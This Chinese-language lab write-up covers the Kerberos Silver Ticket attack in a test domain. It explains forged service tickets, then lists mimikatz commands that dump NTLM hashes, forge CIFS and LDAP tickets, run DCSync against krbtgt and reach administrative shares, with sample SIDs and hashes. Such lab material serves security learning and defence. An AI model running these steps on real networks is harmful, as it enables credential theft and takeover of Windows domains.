服务账号介绍
服务账号就是计算机名字+$用来管理服务的账号
白银票据原理
如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。 在Kerberos认证的第三部,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问
server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。
实验内容
实验环境
机器名称 |
IP地址 |
Windows 10_1(域成员) |
192.168.26.129 |
Windows 10_2(域成员) |
192.168.26.130 |
Windows server 2016(域控) |
192.168.26.114 |
实验前提
- 已经控制了域名并且使用域管理员登录或者提权的system
- 我们目的是访问Windows 10_2的机器
条件如下:
- 域名称
- 域的SID值
- 目标服务器名称
- 可以利用的服务
- 服务账号的NTLM Hash
- 伪造任意用户名
实验步骤
控制域控
- 获取基本信息(域控)
shell whoami /user 获取域的sid值(去掉最后的-500,500表示administrator用户)
shell net config workstation 查看域
SID:S-1-5-21-2665115189-2951733486-2104235742
- 获取服务账号的NTLM Hash值(域控)
mimikatz sekurlsa::logonpasswords
Hash:cb651a1ffbd25853dca7ac9aabaa94af
- 伪造票据(CIFS服务)在域内主机上(不是域控!)
mimikatz kerberos::tgt 查票
mimikatz kerberos::purge 清票
shell klist 查票
shell klist purge 清票
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-2665115189-2951733486-2104235742 /target:dc.hack.com /service:cifs /rc4:cb651a1ffbd25853dca7ac9aabaa94af /user:abcd /ptt
- 访问域控(用创建票据的域内主机)
shell dir \\dc.hack.com\c$
之前访问
有白银票据之后访问
伪造票据(LDAP共享服务)
mimikatz kerberos::tgt 查票
mimikatz kerberos::purge 清票
shell klist 查票
shell klist purge 清票
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-2665115189-2951733486-2104235742 /target:dc.hack.com /service:LDAP /rc4:cb651a1ffbd25853dca7ac9aabaa94af /user:abcd /ptt
- 查询域控的krbtgt(在域内主机上查询(没有LDAP白银票据是无法查询的))
mimikatz lsadump::dcsync /dc:dc.hack.com /domain:hack.com /user:krbtgt
原本获取不到
添加票据之后,可以获取
控制另一台域主机(Windows10 NW2)
- 获取基本信息(域控上获取Windows10 NW2信息)
mimikatz lsadump::dcsync /domain:hack.com /user:PC-nw2$
mimikatz lsadump::lsa /patch #获取所有域用户的Hash值
mimikatz sekurlsa::msv #获取当前主机的SID和Hash值
SID:S-1-5-21-2665115189-2951733486-2104235742
Hash:79871a923c6d9969c220c1bf7230d550
- 伪造票据(CIFS服务)在域内主机上(不是域控!)
mimikatz kerberos::tgt 查票
mimikatz kerberos::purge 清票
shell klist 查票
shell klist purge 清票
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-2665115189-2951733486-2104235742 /target:PC-nw2.hack.com /service:cifs /rc4:79871a923c6d9969c220c1bf7230d550 /user:abcd /ptt
- 访问Windows10 NW2(用创建票据的域内主机)
shell dir \\PC-nw2.hack.com\c$
之前访问
之后访问